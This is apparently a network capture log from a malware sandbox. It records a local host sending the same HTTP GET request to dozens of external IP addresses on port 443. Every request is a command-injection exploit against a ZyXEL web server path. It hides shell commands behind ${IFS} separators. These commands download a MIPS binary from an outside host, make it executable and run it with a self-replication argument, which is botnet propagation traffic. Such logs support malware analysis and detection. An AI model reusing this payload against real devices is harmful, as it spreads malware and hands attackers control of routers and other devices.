                                                Jan 12, 2024 18:24:28.664491892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2651192.168.2.1339568128.244.70.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664526939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2652192.168.2.135183491.185.223.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664572001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2653192.168.2.13465844.88.145.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664616108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2654192.168.2.133768253.249.123.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664638996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2655192.168.2.1347688181.38.253.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664697886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2656192.168.2.133468612.157.119.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664732933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2657192.168.2.1348962146.7.116.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664772034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2658192.168.2.1358032153.96.29.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664793968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2659192.168.2.135401854.113.200.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664834976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2660192.168.2.1359328136.134.162.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664892912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2661192.168.2.1345184188.184.58.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664933920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2662192.168.2.1341570206.47.18.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664961100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2663192.168.2.13488048.98.145.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665008068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2664192.168.2.1357054141.124.0.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665049076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2665192.168.2.135673265.156.152.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665092945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2666192.168.2.1336942205.224.251.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665148973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2667192.168.2.1357780182.115.88.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665158987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2668192.168.2.134569432.247.96.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665170908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2669192.168.2.1335180158.163.159.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665225029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2670192.168.2.1337924173.207.250.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665262938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2671192.168.2.133330823.151.244.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665302992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2672192.168.2.1338320184.194.113.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665333986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2673192.168.2.1341466204.66.111.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665349960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2674192.168.2.1358492171.109.230.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665391922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2675192.168.2.134287091.169.171.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665436029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2676192.168.2.1343190170.238.246.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665479898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2677192.168.2.136074212.202.154.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665507078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2678192.168.2.1354232109.222.196.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665565968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2679192.168.2.135563889.187.93.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665589094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2680192.168.2.133928647.83.250.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665642977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2681192.168.2.1337162203.139.191.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665667057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2682192.168.2.1346088195.89.103.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665719986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2683192.168.2.133297038.210.61.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665754080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2684192.168.2.133405284.91.211.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665792942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2685192.168.2.134603869.164.168.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665827036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2686192.168.2.135707262.16.123.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665877104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2687192.168.2.1351126160.184.27.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665913105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2688192.168.2.1337608196.109.206.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665968895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2689192.168.2.134795671.102.11.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.665986061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2690192.168.2.1349140200.235.223.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666028023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2691192.168.2.134997875.145.75.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666088104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2692192.168.2.1349158147.214.96.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666129112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2693192.168.2.134641489.198.59.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666162014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2694192.168.2.1334262212.38.36.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666192055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2695192.168.2.1355288169.56.179.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666254997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2696192.168.2.1350126108.19.217.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666289091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2697192.168.2.1342852181.78.166.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666332960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2698192.168.2.134049840.65.208.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666368961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2699192.168.2.1344550137.214.65.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666408062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2700192.168.2.135367898.214.152.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666434050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2701192.168.2.134441264.244.0.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666511059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2702192.168.2.1349798130.252.167.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666527033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2703192.168.2.1351730120.218.233.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666577101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2704192.168.2.13521801.36.35.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666632891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2705192.168.2.1357236122.99.19.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666672945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2706192.168.2.136043290.8.151.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666698933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2707192.168.2.1350610126.138.190.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666739941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2708192.168.2.1336576185.245.255.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666780949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2709192.168.2.1353552217.183.32.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666820049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2710192.168.2.1346590126.109.107.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666868925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2711192.168.2.135210678.131.131.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666913033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2712192.168.2.1349414161.190.75.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.666955948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2713192.168.2.1335322204.95.164.194443
                                                TimestampBytes transferredDirectionData
